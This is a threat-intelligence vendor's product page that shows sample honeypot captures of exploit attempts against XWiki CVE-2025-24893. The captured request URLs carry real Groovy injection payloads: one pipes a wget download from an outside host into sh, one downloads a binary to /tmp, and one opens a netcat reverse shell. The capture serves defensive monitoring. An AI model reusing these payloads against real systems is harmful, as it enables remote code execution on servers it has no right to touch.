Sign In

Canary Intelligence

Data from globally deployed Internet sensors revealing the first signs of vulnerability exploitation.
Schedule A Demo
GET /v3/index/vulncheck-canaries
    [
  {
    "src_ip": "193.26.115.195",
    "src_port": 47922,
    "src_country": "US",
    "dst_country": "BR",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlNUIlMjdzaCUyNyUyQyUyMCUyNy1jJTI3JTJDJTIwJTI3d2dldCUyMC1xTy0lMjBodHRwJTNBJTJGJTJGNzQuMTk0LjE5MS41MiUyRnJvbmRvLnNkdS5zaCU3Q3NoJTI3JTVELmV4ZWN1dGUlMjglMjkudGV4dCU3QiU3QiUyRmdyb292eSU3RCU3RCU3QiU3QiUyRmFzeW5jJTdEJTdEIEhUVFAvMS4xDQpIb3N0OiBWQ19SRURBQ1RFRA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKGJhbmcyMDEzQGF0b21pY21haWwuaW8pDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K",
    "http": {
      "url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D",
      "http_user_agent": "Mozilla/5.0 (bang2013@atomicmail.io)",
      "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-11-07T07:58:51.064Z"
  },
  {
    "src_ip": "172.206.196.45",
    "src_port": 51864,
    "src_country": "US",
    "dst_country": "CA",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN2QlN2QlN2QlN2IlN2Jhc3luYyUyMGFzeW5jJTNkZmFsc2UlN2QlN2QlN2IlN2Jncm9vdnklN2QlN2RwcmludGxuKCUyMndnZXQlMjBodHRwOi8vOTAuMTU2LjIxOC4zMTo4MDgwL1ZreTBiNEo5SzMveDY0MCUyMC1PJTIwL3RtcC9mMWM1ZiUyMi5leGVjdXRlKCkudGV4dCklN2IlN2IlMmZncm9vdnklN2QlN2QlN2IlN2IlMmZhc3luYyU3ZCU3ZCUyMCBIVFRQLzEuMQ0KSG9zdDogVkNfUkVEQUNURUQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzE1XzcpIEFwcGxlV2ViS2l0LzYwNS4xLjE1IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi8xNi40LjEgU2FmYXJpLzYwNS4xLjE1DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4NCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=",
    "http": {
      "url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22wget%20http://90.156.218.31:8080/Vky0b4J9K3/x640%20-O%20/tmp/f1c5f%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
      "http_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15",
      "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-11-01T12:14:26.712Z"
  },
  {
    "src_ip": "18.228.3.224",
    "src_port": 37348,
    "src_country": "BR",
    "dst_country": "FR",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlMjJidXN5Ym94JTIwbmMlMjAxOC4yMjguMy4yMjQlMjA4NDQzJTIwLWUlMjAvYmluL2Jhc2glMjIuZXhlY3V0ZSUyOCUyOSU3QiU3Qi9ncm9vdnklN0QlN0QlN0IlN0IvYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi40DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
    "http": {
      "url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2018.228.3.224%208443%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
      "http_user_agent": "python-requests/2.32.4",
      "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-10-31T10:16:30.275Z"
  }
]
VulnCheck Platform

Why VulnCheck Canary Intelligence

  • Real Vulnerability Exposure
    Unlike traditional honeypots, VulnCheck Canary Intelligence deploys actually vulnerable systems across the Internet, capturing real-world attacker behaviors and exploitation techniques in the wild.
  • Actionable Exploit Intelligence
    Each attack is correlated with known CVEs, exploited software, and attacker tooling, providing immediate context to prioritize vulnerabilities that are actively being targeted — not just theoretically exploitable.
  • Early Threat Detection
    Canary Intelligence delivers early warning signals of emerging campaigns, identifying new exploit activity days or weeks before traditional intelligence products or public disclosures.
  • Continuous Global Coverage
    With a constantly refreshed network of monitored vulnerable systems worldwide, VulnCheck Canary Intelligence provides continuous insight into attacker operations, trends, and the evolving threat landscape.

Ready to get Started?

Explore VulnCheck, a next-generation Cyber Threat Intelligence platform, which provides exploit and vulnerability intelligence to help you prioritize and remediate vulnerabilities that matter.
  • Vulnerability Prioritization
    Prioritize vulnerabilities that matter based on the threat landscape and defer vulnerabilities that don't.
  • Early Warning System
    Real-time alerting of changes in the vulnerability landscape so that you can take action before the attacks start.
Schedule a Demo